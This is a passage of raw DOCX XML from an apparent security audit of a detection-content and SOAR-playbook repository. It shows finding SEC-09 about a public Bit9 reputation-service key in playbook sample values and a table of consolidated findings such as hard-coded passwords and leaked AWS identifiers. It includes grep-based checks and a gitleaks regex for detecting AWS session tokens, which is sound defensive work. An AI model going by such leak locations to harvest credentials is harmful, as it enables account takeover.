        <w:t>Verdict: Not exploitable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sed -n '120p' data_sources/aws_cloudtrail_assumerolewithsaml.yml | grep -o '"expiration": "[^"]*"'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"expiration": "Jan 22, 2021 3:59:16 AM"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>grep -c secretAccessKey data_sources/aws_cloudtrail_assumerolewithsaml.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> replace the token with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"sessionToken": "EXAMPLE_SESSION_TOKEN"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (rule included in the SEC-03 scrubber); keep </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>expiration</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> so the field list stays representative. Add the gitleaks custom rule </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>IQoJb3JpZ2luX2Vj[A-Za-z0-9+/=]{100,}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (STS token magic prefix) proposed in SEC-08.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mappings:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-312, CWE-540; OWASP A02; ASVS 8.3.4; ATT&amp;CK T1552.001, T1550.001; NIST 800-53 SC-28, IA-5; CSF PR.DS-01; ISO 27001 A.8.24; SANS Data Protection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-312 Cleartext Storage of Sensitive Information; CWE-540 Inclusion of Sensitive Information in Source Code. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A02:2021 Cryptographic Failures. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1552.001 Unsecured Credentials: Credentials In Files, T1550 Use Alternate Authentication Material. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SC-28 Protection of Information at Rest, IA-5 Authenticator Management. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.DS Protect - Data Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.24 Use of cryptography. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Secrets / Data Protection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SEC-09 — Third-party reputation-service URL with alliance key parameters in SOAR playbook sample values</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Informational (no CVSS score (informational)). Exploitability: Not exploitable (public well-known value).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/ransomware_investigate_and_contain.json:2861,3520; malware_hunt_and_contain.json:3202,3861,4508,5190,7182,7841; email_notification_for_malware.json:4166,4825,6878,7537</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Informational – CVSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>playbooks/ransomware_investigate_and_contain.json:2861, 3520</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>playbooks/malware_hunt_and_contain.json:3202, 3861, 4508, 5190, 7182, 7841</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>playbooks/email_notification_for_malware.json:4166, 4825, 6878, 7537</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"example_values": ["https://services.bit9.com/Services/extinfo.aspx?ak=b8b4… (len 32)&amp;sg=0313… (len 32)&amp;md5=…"]</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>alliance_link_srstrust</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> field of Carbon Black Response binary results carries the Bit9 Software Reputation Service link; the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ak</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pair is the alliance key/signature baked into every CB Response server and reproduced in Carbon Black's own public API documentation and many public repositories – (c) a public well-known value, not an org secret, and the service is retired. Listed so a future reviewer does not have to re-derive that, and because the same sample blocks embed internal console URLs (SEC-10).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> n/a. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Not exploitable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>grep -rnoE 'extinfo\.aspx\?ak=[a-f0-9]+' playbooks | wc -l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> strip </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>example_values</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from exported playbook JSON before commit (SOAR export without app-run data), or replace with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>https://example.com/extinfo?ak=REDACTED</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mappings:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-540; OWASP A05; ASVS 14.3.3; NIST 800-53 SA-11; ISO 27001 A.8.24; SANS Data Protection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-540 Inclusion of Sensitive Information in Source Code. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A05:2021 Security Misconfiguration. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SA-11 Developer Testing and Evaluation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.24 Use of cryptography. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Secrets / Data Protection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.8 Consolidated Duplicate Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The following findings were raised by more than one reviewer for the same underlying issue and are consolidated under the canonical identifier shown.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="864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728"/>
        <w:gridCol w:w="1645"/>
        <w:gridCol w:w="5267"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Canonical finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1645" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Also reported as</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5267" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Issue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1645" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SEC-01, DET-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5267" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Hard-coded AWS IAM console password applied to every re-enabled user (public repository)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1645" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SEC-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5267" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Splunkbase session token printed to CI logs by ta_update.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1645" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SEC-07, DET-17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5267" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Non-cryptographic PRNG used to generate the new Active Directory password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1645" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5267" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Destructive response actions (account disable/enable, quarantine, kill, delete, block, global prevent IOC) with no approval gate or allow-list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1645" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SEC-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5267" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Hard-coded admin password for the throw-away CI Splunk container (informational)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1645" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SEC-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5267" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Lookup CSV cells beginning with formula characters (export-boundary CSV injection surface only)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SEC-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1645" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5267" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Incomplete sanitisation of CloudTrail example logs leaks real AWS account IDs, access-key IDs, principals, roles and buckets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SEC-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1645" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5267" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Internal infrastructure and cloud-tenant identifiers disclosed (hostnames, private URLs, tenant GUIDs, S3 buckets, playground endpoint)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1645" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5267" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DSDL/MLTK notebooks deserialise models with pickle and torch.load on stale libraries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1645" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
